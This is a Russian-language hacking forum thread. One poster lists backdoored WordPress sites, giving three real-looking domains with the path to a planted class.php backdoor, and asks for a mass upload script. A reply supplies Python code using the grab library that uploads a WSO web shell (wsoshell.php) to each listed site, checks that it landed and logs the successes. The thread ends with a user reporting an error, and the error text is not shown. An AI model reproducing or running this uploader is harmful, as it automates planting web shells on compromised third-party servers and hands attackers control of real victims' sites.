Привет Всем! Сильно не пинать если запостил не в тот раздел. Сразу к делу... Некоторое время назад назаливал бэкдоров на ресы где часто тёрли wso'шный шелл. Теперь собрался не плохой список бэкдоров где не осталось: ни wso, ни уязвимости. А остались такого рода бэкдорчики: http://10acresflat.com/wp-content/plugins/iwp-client/class.php http://activewindowcleaners.com.au/wp-content/plugins/iwp-client/class.php http://www.affordableca.com/wp-content/plugins/iwp-client/class.php Теперя же кто поможет составить запрос я предполагаю на cURL'е который бы брал из списка домены с путём до бэкдора и заливал туда указанный рядом файл. За помощь буду ооочень признателен!!! P.S.: ну не ручками же заливать, ладно бы там десяток был, а тут...
На python можно сделать, с использованием библиотеки grablib, предварительно установив python2.7 и саму библиотеку http://docs.grablib.org/en/latest/usage/installation.html Почитать про загрузку файла можно здесь: http://docs.grablib.org/en/latest/grab/file_uploading.html Могу скинуть готовый код если устраивает такое решение
PHP: #!/usr/bin/env python# -*- coding: utf-8 -*-from grab import Grabg = Grab()with open("url_source.txt","r") as f: #список url без http://www. for line in f: url=line.replace('\n', '') from grab import UploadFile g.go("http://www.%s" %url) g.doc.set_input('название_формы', UploadFile('wsoshell.php')) #файл шелла должен лежать в папке со скриптом, название формы замени на свое ("f") g.doc.submit() print 'Вроде залили...' g.go("http://%s/wsoshell.php" %url) #Проверка шелла на сервере otvet = g.response.code if otvet == 200: file = open("good.txt", "a") file.write('%s\n' %url) print 'Залито! URL:',url print else: print 'Не получилось' file = open("404.txt", "a") file.write('%s\n' %url) print url Если что пиши, код не проверял, должен работать, вроде ничего не упустил Модули pycurl и lxml для grab можно установить через easy_install
Дружище будь добр проверь скрипт у себя, настроил скрипт под себя, установил все модули, но всё равно вылазиет вот такая хрень:
